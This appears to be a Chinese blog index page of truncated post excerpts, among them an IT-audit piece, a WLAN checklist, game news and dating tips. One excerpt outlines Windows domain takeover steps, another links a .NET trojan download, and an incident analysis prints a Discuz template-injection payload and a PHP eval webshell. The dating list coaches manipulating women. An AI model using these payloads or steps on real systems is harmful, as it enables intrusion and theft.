如今内部人员给公司的安全造成的威胁非同小可。近来的一些报告指出,内部人员对公司的损害在 所有的危害事件中已从80%上升为86%,而且超过半数发生在雇员的终端。无疑,拥有访问公司系统权限的内部雇员极有可能被误导到那些欺诈性的或危险的链 接上。而在所有的雇员中,IT工作人员拥有的这种访问权限最多。因此,IT审核应关注从多个方面确认风险。下面我们给出实施有关控制和减少工作人员对管理 员欺诈的方法。
1.IT安全策略
管理人员应该审视那些能够管理特权账户(如域管理员账户、应用程序管理员账户、数据 库管理员)的IT安全策略,要保障安全策略的存在,还要清楚存取访问是如何被处理、验证、证明的,要确保对这些策略定期进行审查。否则,基本上就不存在管 理特权访问的基础了。在没有相关报告的情况下,管理特权账户的策略是不完整的。特权账户的口令审核报告经常要涉及到如下的问题:口令何时更新、更新失败有 哪些,以及在一个共享账户下,个别用户如何执行任务等等。
制定的策略应具有这样的目标:能够终止明显的不可防御的用户活动。要确保所有的雇员、订约人和其它用户清楚其责任,从而与IT的安全策略、方法以及与其角色相适应的相关指导等。
阅读全文...
ngnix很强大:
proxy_cache_path /home/web/cache levels=1:2 keys_zone=BAOZ:100m inactive=50m max_size=20m;
阅读全文...
Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.
You can also browse the network neighborhood or use the net view command.
Aquiring and cracking the hashes of your target is generally useful as well.
Enumerate group membership so you know who to target.
Get the usernames in the local administrators group:
阅读全文...
各位女性同胞以逆向的角度来看这篇文章:
也许你正要追求某个女孩,也许你即将要向自己喜爱的女友提出结婚的心愿,也许你与新娘在蜜月中享受温馨,也许你已与结发的妻子一同筑起三口小巢,也许,还有很多也许。但有一点应是一致的,每一位男士都想让自己心爱的她对你动以真情。或许你已品味了成功的喜悦,或许你尝试了很多却失败连连?这里我们为你推荐了21种容易成功的时刻。
1、女性单独与男性接触时最容易动心。男性应抓住这一时机表示出积极主动,如果有第三者在场她们通常会断然拒绝男性以掩饰自己的真实感情。
2、女性在封闭的空间内待久以后,内心的不平衡易产生心理异常,滋生出爱的情感。男性可利用这一心理特点加强求爱攻势。
3、当听到男性情话时女性易产生情意。男性对视觉的刺激比较敏感而女性则对听觉的刺激比较敏感。在电话中男性亲切温柔富有乐感的话语能更快地打动女性。男性应充分调动自己语言的魅力。
4、刚同男性约会完毕的女性身心极不安定,还会长久停留在对约会情调的陶醉和期待中。男性可以在约会即将结束时进一步打动对方。
5、当女性处于一个清洁舒适的环境时最容易动情。这种环境不会令她感到厌恶和不安,易使她全身心放松从而感情活跃起来。
阅读全文...
转自:http://www.im286.com/thread-3742085-1-1.html
前段时间单位的服务器上被人上传了一个.NET木马,,这次让我认识到以前没有见过的上传木马的招数,,同时也找出一些对策,,咱落伍论坛很多都有服务器的,,就分享出来给大家吧。
.net木马目前很强的,,下载地址:http://www.rootkit.net.cn/article.asp?id=132 (你可以上传到你的服务器上看看对你的系统都能做什么)
此木马是一个.NET程序制作,如果你的服务器支持.NET那就要注意了,,进入木马有个功能叫:IIS Spy,点击以后可以看到所有站点所在的物理路径。以前有很多人提出过,但一直没有人给解决的答案。。
防御方法:
阅读全文...
新闻来源:NGA
暴雪在BlizzCon09宣布魔兽世界的第三个资料片,天崩地裂(Cataclysm)!藏身在地深之源的圣殿里,堕落的守护巨龙-死亡之翼静静等着, 等待从最后一次与艾泽拉斯交战时所受的伤势中复原;静候能用复活之火重新吞噬世界的时机来临。很快的,毁灭者死亡之翼将会回到艾泽拉斯,当他从地深之源破 巢而出的那一刻将会割裂整个世界,在大陆上留下一道无法抹灭的伤痕。 玩家将能以两个新种族 — 地精和狼人 — 来进行游戏和探索艾泽拉斯新出现的地区,并重新体验卡里姆多和东部王国的经典区域,被巨大灾难改变的地形,充满了新的冒险机会。玩家的力量将会提升到新的层次,面对新副本的挑战,并体验即将横扫艾泽拉斯地表的永久改变。
视频地址:
阅读全文...
初步推测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门。
自定义模板变量:
变 量 :
{’,”);ECHO ”;$X=SUBSTR(MD5($_GET['B']),28);IF($X==’7aaa’)EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
程序代码:
< ?php (substr(md5($_POST['b']),28)==’7aaa’) && eval($_POST['a']);?>
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
Por Una Cabeza 中文译名《只差一步》或《一步之遥》。这首华丽而高贵动人的探戈名曲,出现在众多电影配乐中,是阿根廷探戈舞曲的极致代表,也是全世界乐迷所最为熟知而深深爱上探戈旋律,由阿根廷史上最负盛名的阿根廷探戈无冕之王 Carlos Gardel(卡洛斯·加德尔)所作。
自1935年诞生以来,Por Una Cabeza成为电影中探戈的首选舞曲,钢柔并济的旋律似乎适应着每一个角色的心理任何一个场景的铺垫。电影《闻香识女人》(又译 女人香)、《真实的谎言》、《辛德勒的名单》,《史密斯夫妇》中都选择了 Por Una Cabeza 作为电影中的舞曲,此外《魔鬼大帝》和《纵横四海》也都是选择了这首名曲, 其魅力可见一斑。
别于近代阿根廷探戈音乐大师艾斯特皮亚左拉(Astor Piazzola)将探戈与西方古典、爵士音乐结合而创造出新现代的探戈组曲;卡洛斯·加德尔(Carlos Gardel)作品所代表的意义是将探戈音乐歌曲化、将这个流传于阿根廷的民间音乐成功的推向巴黎及纽约等城市上流社会国际舞台的第一人,也是探戈音乐全盛成熟时期开始的代表人物,英俊潇洒的他更深受欧美地区国家的乐迷所热爱,是阿根廷探戈音乐世界里的猫王!创作出众多经典探戈名曲的卡洛斯葛戴尔拥有百张以上的唱片录音在全世界发行,即便在逝世的多年后的今天,他仍是阿根廷的音乐传奇,广受全世界乐迷的尊崇与喜爱!
阅读全文...
漏洞评估可以帮助你在攻击者利用前,找到并修复WLAN漏洞。但是从哪里开始呢?应该查找什么呢?如何涵盖所有的位置呢?在这份清单中,TechTarget中国的特约专家将帮助你回答这些问题。
1.发现临近的无线设备
如果你知道有什么设备,就不能评估WLAN漏洞。从搜索办公室内外的无线设备开始,创建后续步骤的基础。
*那一个通道拥有2.4 GHz带宽的活跃流量?
*那一个通道拥有2.4 GHz带宽的活跃流量?
*在这些频段中,有没有非—802.11界面的资源呢?
对每一个已知的802.11访问端点,记录:
*媒体访问控制(MAC)地址
*扩展服务集标识符(ESSID)
*通道
*平均/最高信噪比(SNR)
对每一个一发现的802.11工作站,记录:
*MAC地址
*关联ESSID
*关联接入点或者同等的工作站
*平均/最高SNR
*如果可见,802.1X身份
*大约位置和可能的持有人
阅读全文...
最近评论